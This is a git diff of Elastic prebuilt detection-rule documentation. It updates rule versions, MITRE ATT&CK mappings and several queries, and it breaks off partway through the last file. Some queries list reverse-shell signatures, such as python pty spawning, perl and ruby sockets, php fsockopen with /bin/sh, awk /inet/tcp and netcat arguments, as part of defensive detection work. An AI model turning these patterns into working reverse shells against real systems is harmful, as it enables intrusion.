a/docs/detections/prebuilt-rules/rule-details/suspicious-image-load-taskschd-dll-from-ms-office.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-image-load-taskschd-dll-from-ms-office.asciidoc index 8c28f696cc..51f51c26fe 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-image-load-taskschd-dll-from-ms-office.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-image-load-taskschd-dll-from-ms-office.asciidoc @@ -33,10 +33,11 @@ Identifies a suspicious image load (taskschd.dll) from Microsoft Office processe * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -75,3 +76,19 @@ any where host.os.type == "windows" and ** Name: Scheduled Task/Job ** ID: T1053 ** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-imagepath-service-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-imagepath-service-creation.asciidoc index fec92009d8..ce9dd0079c 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-imagepath-service-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-imagepath-service-creation.asciidoc @@ -28,10 +28,11 @@ Identifies the creation of a suspicious ImagePath value. This could be an indica * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -68,3 +69,11 @@ registry where host.os.type == "windows" and registry.path : ( ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-java-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-java-child-process.asciidoc index be2379bb1b..c0fe63ae3f 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-java-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-java-child-process.asciidoc @@ -3,7 +3,7 @@ Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -39,7 +39,7 @@ Identifies suspicious child processes of the Java interpreter process. This may * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 105 +*Version*: 205 *Rule authors*: @@ -88,9 +88,9 @@ This rule identifies a suspicious child process of the Java interpreter process. [source, js] ---------------------------------- -process where event.type in ("start", "process_started") and - process.parent.name : "java" and - process.name : ("sh", "bash", "dash", "ksh", "tcsh", "zsh", "curl", "wget") +event.category:process and event.type:("start" or "process_started") and process.parent.name:"java" and process.name:( + "sh" or "bash" or "dash" or "ksh" or "tcsh" or "zsh" or "curl" or "wget" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-managed-code-hosting-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-managed-code-hosting-process.asciidoc index f259239835..47de203f54 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-managed-code-hosting-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-managed-code-hosting-process.asciidoc @@ -33,7 +33,7 @@ Identifies a suspicious managed code hosting process which could indicate code i * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -52,7 +52,7 @@ sequence by process.entity_id with maxspan=5m process.name : ("wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe", "regsvr32.exe", "svchost.exe", "dllhost.exe", "cmstp.exe")] [file where host.os.type == "windows" and event.type != "deletion" and file.name : ("wscript.exe.log", - "cscript.exe", + "cscript.exe.log", "mshta.exe.log", "wmic.exe.log", "svchost.exe.log", diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-mining-process-creation-event.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-mining-process-creation-event.asciidoc index 8578c3a3e4..64d442a637 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-mining-process-creation-event.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-mining-process-creation-event.asciidoc @@ -31,7 +31,7 @@ Identifies service creation events of common mining services, possibly indicatin * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-modprobe-file-event.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-modprobe-file-event.asciidoc index aadab7dc89..16616a49a1 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-modprobe-file-event.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-modprobe-file-event.asciidoc @@ -3,7 +3,7 @@ Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -29,7 +29,7 @@ Detects file events involving kernel modules in modprobe configuration files, wh * Tactic: Discovery * Rule Type: BBR -*Version*: 3 +*Version*: 103 *Rule authors*: @@ -70,12 +70,8 @@ Add the newly installed `auditd manager` to an agent policy, and deploy the agen [source, js] ---------------------------------- -file where host.os.type == "linux" and event.action == "opened-file" and -file.path : ("/etc/modprobe.conf", "/etc/modprobe.d", "/etc/modprobe.d/*") and not -( - process.name in ("auditbeat", "kmod", "modprobe", "lsmod", "insmod", "modinfo", "rmmod", "dpkg", "cp", "mkinitramfs", - "readlink") or process.title : "*grep*" or process.parent.pid == 1 -) +host.os.type:linux and event.category:file and event.action:"opened-file" and +file.path : ("/etc/modprobe.conf" or "/etc/modprobe.d" or /etc/modprobe.d/*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-ms-office-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-ms-office-child-process.asciidoc index 88dc28a7a2..b2c3e4ba93 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-ms-office-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-ms-office-child-process.asciidoc @@ -32,12 +32,13 @@ Identifies suspicious child processes of frequently targeted Microsoft Office ap * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access -* Resources: Investigation Guide +* Tactic: Defense Evasion * Tactic: Execution +* Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -139,6 +140,18 @@ process where host.os.type == "windows" and event.type == "start" and ** ID: T1059 ** Reference URL: https://attack.mitre.org/techniques/T1059/ * Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: ** Name: Windows Command Shell ** ID: T1059.003 ** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-ms-outlook-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-ms-outlook-child-process.asciidoc index 434e5f7a3e..838351fc28 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-ms-outlook-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-ms-outlook-child-process.asciidoc @@ -30,11 +30,13 @@ Identifies suspicious child processes of Microsoft Outlook. These child processe * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -128,3 +130,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Spearphishing Attachment ** ID: T1566.001 ** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-net-code-compilation.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-net-code-compilation.asciidoc index 8e630f0eff..cfa72f579d 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-net-code-compilation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-net-code-compilation.asciidoc @@ -1,7 +1,7 @@ [[suspicious-net-code-compilation]] === Suspicious .NET Code Compilation -Identifies suspicious .NET code execution. connections. +Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms. *Rule type*: eql @@ -30,10 +30,11 @@ Identifies suspicious .NET code execution. connections. * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -75,3 +76,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Compile After Delivery ** ID: T1027.004 ** Reference URL: https://attack.mitre.org/techniques/T1027/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-net-reflection-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-net-reflection-via-powershell.asciidoc index e422ed0581..b4aa2ce08b 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-net-reflection-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-net-reflection-via-powershell.asciidoc @@ -30,10 +30,11 @@ Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerSh * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -136,6 +137,10 @@ event.category:process and host.os.type:windows and ** ID: TA0005 ** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: +** Name: Reflective Code Loading +** ID: T1620 +** Reference URL: https://attack.mitre.org/techniques/T1620/ +* Technique: ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc index 9b00e1955f..b9f7f3df12 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc @@ -34,7 +34,7 @@ This rule monitors for network connectivity to the internet from a previously un * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -48,64 +48,23 @@ This rule monitors for network connectivity to the internet from a previously un [source, js] ---------------------------------- -host.os.type:linux and event.category:network and -event.action:(connection_attempted or ipv4_connection_attempt_event) and -process.executable : ( - (/etc/crontab or - /etc/rc.local or - /boot/* or - /dev/shm/* or - /etc/cron.*/* or - /etc/init.d/* or - /etc/rc*.d/* or - /etc/update-motd.d/* or - /home/*/.* or - /run/* or - /srv/* or - /tmp/* or - /usr/lib/update-notifier/* or - /var/tmp/*) and - not (/usr/bin/apt or - /usr/bin/curl or - /usr/bin/dnf or - /usr/bin/dockerd or - /usr/bin/dpkg or - /usr/bin/rpm or - /usr/bin/wget or - /usr/bin/yum) - ) -and source.ip : ( - 10.0.0.0/8 or - 127.0.0.0/8 or - 172.16.0.0/12 or - 192.168.0.0/16) and - not destination.ip : ( - 10.0.0.0/8 or - 100.64.0.0/10 or - 127.0.0.0/8 or - 169.254.0.0/16 or - 172.16.0.0/12 or - 192.0.0.0/24 or - 192.0.0.0/29 or - 192.0.0.10/32 or - 192.0.0.170/32 or - 192.0.0.171/32 or - 192.0.0.8/32 or - 192.0.0.9/32 or - 192.0.2.0/24 or - 192.168.0.0/16 or - 192.175.48.0/24 or - 192.31.196.0/24 or - 192.52.193.0/24 or - 192.88.99.0/24 or - 198.18.0.0/15 or - 198.51.100.0/24 or - 203.0.113.0/24 or - 224.0.0.0/4 or - 240.0.0.0/4 or - "::1" or - "FE80::/10" or - "FF00::/8") +host.os.type:linux and event.category:network and event.action:(connection_attempted or ipv4_connection_attempt_event) and +process.executable:( + (/etc/crontab or /etc/rc.local or ./* or /boot/* or /dev/shm/* or /etc/cron.*/* or /etc/init.d/* or /etc/rc*.d/* or + /etc/update-motd.d/* or /home/*/.* or /run/* or /srv/* or /tmp/* or /usr/lib/update-notifier/* or /var/tmp/* + ) and not (/tmp/newroot/* or /tmp/snap.rootfs*) + ) and +source.ip:(10.0.0.0/8 or 127.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and +not process.name:( + apt or chrome or curl or dnf or dockerd or dpkg or firefox-bin or java or kite-update or kited or node or rpm or + saml2aws or wget or yum or ansible* or aws* or php* or pip* or python* or steam* or terraform* +) and +not destination.ip:( + 10.0.0.0/8 or 100.64.0.0/10 or 127.0.0.0/8 or 169.254.0.0/16 or 172.16.0.0/12 or 192.0.0.0/24 or 192.0.0.0/29 or + 192.0.0.10/32 or 192.0.0.170/32 or 192.0.0.171/32 or 192.0.0.8/32 or 192.0.0.9/32 or 192.0.2.0/24 or + 192.168.0.0/16 or 192.175.48.0/24 or 192.31.196.0/24 or 192.52.193.0/24 or 192.88.99.0/24 or 198.18.0.0/15 or + 198.51.100.0/24 or 203.0.113.0/24 or 224.0.0.0/4 or 240.0.0.0/4 or "::1" or "FE80::/10" or "FF00::/8" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-pdf-reader-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-pdf-reader-child-process.asciidoc index 5cb4b81eda..6aa012cea8 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-pdf-reader-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-pdf-reader-child-process.asciidoc @@ -30,11 +30,12 @@ Identifies suspicious child processes of PDF reader applications. These child pr * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Initial Access * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -125,6 +126,18 @@ process where host.os.type == "windows" and event.type == "start" and ** ID: TA0002 ** Reference URL: https://attack.mitre.org/tactics/TA0002/ * Technique: -** Name: User Execution -** ID: T1204 -** Reference URL: https://attack.mitre.org/techniques/T1204/ +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-portable-executable-encoded-in-powershell-script.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-portable-executable-encoded-in-powershell-script.asciidoc index 9ba95212ed..3a1d6cebba 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-portable-executable-encoded-in-powershell-script.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-portable-executable-encoded-in-powershell-script.asciidoc @@ -30,10 +30,11 @@ Detects the presence of a portable executable (PE) in a PowerShell script by loo * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -132,3 +133,11 @@ event.category:process and host.os.type:windows and ** Name: PowerShell ** ID: T1059.001 ** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-proc-pseudo-file-system-enumeration.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-proc-pseudo-file-system-enumeration.asciidoc index e9847b8113..76ccaf8038 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-proc-pseudo-file-system-enumeration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-proc-pseudo-file-system-enumeration.asciidoc @@ -29,7 +29,7 @@ This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and e * Tactic: Discovery * Rule Type: BBR -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -69,9 +69,10 @@ Add the newly installed `auditd manager` to an agent policy, and deploy the agen [source, js] ---------------------------------- -host.os.type : "linux" and event.category : "file" and event.action : "opened-file" and -file.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : "pidof" and -not process.parent.pid : 1 +host.os.type:linux and event.category:file and event.action:"opened-file" and +file.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : ( + ps or netstat or landscape-sysin or w or pgrep or pidof or needrestart or apparmor_status +) and not process.parent.pid : 1 ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-process-access-via-direct-system-call.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-process-access-via-direct-system-call.asciidoc index fb237482da..6bdcaa5ed0 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-process-access-via-direct-system-call.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-process-access-via-direct-system-call.asciidoc @@ -31,10 +31,11 @@ Identifies suspicious process access events from an unknown memory region. Endpo * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Sysmon Only -*Version*: 208 +*Version*: 209 *Rule authors*: @@ -141,3 +142,11 @@ process where host.os.type == "windows" and event.code == "10" and ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-via-renamed-psexec-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-via-renamed-psexec-executable.asciidoc index 4a9f8def15..8c34c1744c 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-via-renamed-psexec-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-via-renamed-psexec-executable.asciidoc @@ -30,11 +30,12 @@ Identifies suspicious psexec activity which is executing from the psexec service * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -104,3 +105,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Service Execution ** ID: T1569.002 ** Reference URL: https://attack.mitre.org/techniques/T1569/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-process-spawned-from-motd-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-process-spawned-from-motd-detected.asciidoc index 7329f4d48c..5ad53a0c21 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-process-spawned-from-motd-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-process-spawned-from-motd-detected.asciidoc @@ -34,7 +34,7 @@ Message of the day (MOTD) is the message that is presented to the user when a us * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -106,6 +106,7 @@ This rule identifies the execution of potentially malicious processes from a MOT - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -113,11 +114,29 @@ This rule identifies the execution of potentially malicious processes from a MOT [source, js] ---------------------------------- -process where host.os.type == "linux" and -event.type == "start" and event.action : ("exec", "exec_event") and -process.parent.executable : ("/etc/update-motd.d/*", "/usr/lib/update-notifier/*") and -process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "perl", "php*", "nc", "ncat", -"netcat", "socat", "lua", "java", "openssl", "ruby", "telnet") +process where event.type == "start" and event.action : ("exec", "exec_event") and +process.parent.executable : ("/etc/update-motd.d/*", "/usr/lib/update-notifier/*") and ( + (process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and ( + (process.args : ("-i", "-l")) or (process.parent.name == "socat" and process.parent.args : "*exec*"))) or + (process.name : ("nc", "ncat", "netcat", "nc.openbsd") and process.args_count >= 3 and + not process.args : ("-*z*", "-*l*")) or + (process.name : "python*" and process.args : "-c" and process.args : ( + "*import*pty*spawn*", "*import*subprocess*call*" + )) or + (process.name : "perl*" and process.args : "-e" and process.args : "*socket*" and process.args : ( + "*exec*", "*system*" + )) or + (process.name : "ruby*" and process.args : ("-e", "-rsocket") and process.args : ( + "*TCPSocket.new*", "*TCPSocket.open*" + )) or + (process.name : "lua*" and process.args : "-e" and process.args : "*socket.tcp*" and process.args : ( + "*io.popen*", "*os.execute*" + )) or + (process.name : "php*" and process.args : "-r" and process.args : "*fsockopen*" and process.args : "*/bin/*sh*") or + (process.name : ("awk", "gawk", "mawk", "nawk") and process.args : "*/inet/tcp/*") or + (process.name in ("openssl", "telnet")) +) and +not (process.parent.args : "--force" or process.args : ("/usr/games/lolcat", "/usr/bin/screenfetch")) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-rdp-activex-client-loaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-rdp-activex-client-loaded.asciidoc index 7012c16713..df01d48dff 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-rdp-activex-client-loaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-rdp-activex-client-loaded.asciidoc @@ -35,7 +35,7 @@ Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Clien * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -87,3 +87,7 @@ any where host.os.type == "windows" and ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-remote-registry-access-via-sebackupprivilege.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-remote-registry-access-via-sebackupprivilege.asciidoc index bad872a5fc..8a988bd819 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-remote-registry-access-via-sebackupprivilege.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-remote-registry-access-via-sebackupprivilege.asciidoc @@ -38,7 +38,7 @@ Identifies remote access to the registry using an account with Backup Operators * Use Case: Active Directory Monitoring * Data Source: Active Directory -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -112,6 +112,10 @@ sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan= ** Name: Security Account Manager ** ID: T1003.002 ** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: LSA Secrets +** ID: T1003.004 +** Reference URL: https://attack.mitre.org/techniques/T1003/004/ * Tactic: ** Name: Lateral Movement ** ID: TA0008 diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-files.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-files.asciidoc index a59a88cbca..370ee17fb9 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-files.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-files.asciidoc @@ -31,7 +31,7 @@ Identifies instances where VMware-related files, such as those with extensions l * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc index 447509f06f..d8deb5f7cf 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-renaming-of-esxi-index-html-file.asciidoc @@ -31,7 +31,7 @@ Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-script-object-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-script-object-execution.asciidoc index 84ea14e55a..7041b14eed 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-script-object-execution.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-script-object-execution.asciidoc @@ -29,7 +29,7 @@ Identifies scrobj.dll loaded into unusual Microsoft processes. This usually mean * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -79,3 +79,7 @@ sequence by process.entity_id with maxspan=2m ** Name: System Binary Proxy Execution ** ID: T1218 ** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-startup-shell-folder-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-startup-shell-folder-modification.asciidoc index 8bb5a2e14f..aa0f392c76 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-startup-shell-folder-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-startup-shell-folder-modification.asciidoc @@ -28,11 +28,12 @@ Identifies suspicious startup shell folder modifications to change the default S * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -141,3 +142,11 @@ registry where host.os.type == "windows" and ** Name: Registry Run Keys / Startup Folder ** ID: T1547.001 ** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-symbolic-link-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-symbolic-link-created.asciidoc index 229dc0f141..3a7f2245c5 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-symbolic-link-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-symbolic-link-created.asciidoc @@ -32,7 +32,7 @@ Identifies the creation of a symbolic link to a suspicious file or location. A s * Data Source: Elastic Endgame * Data Source: 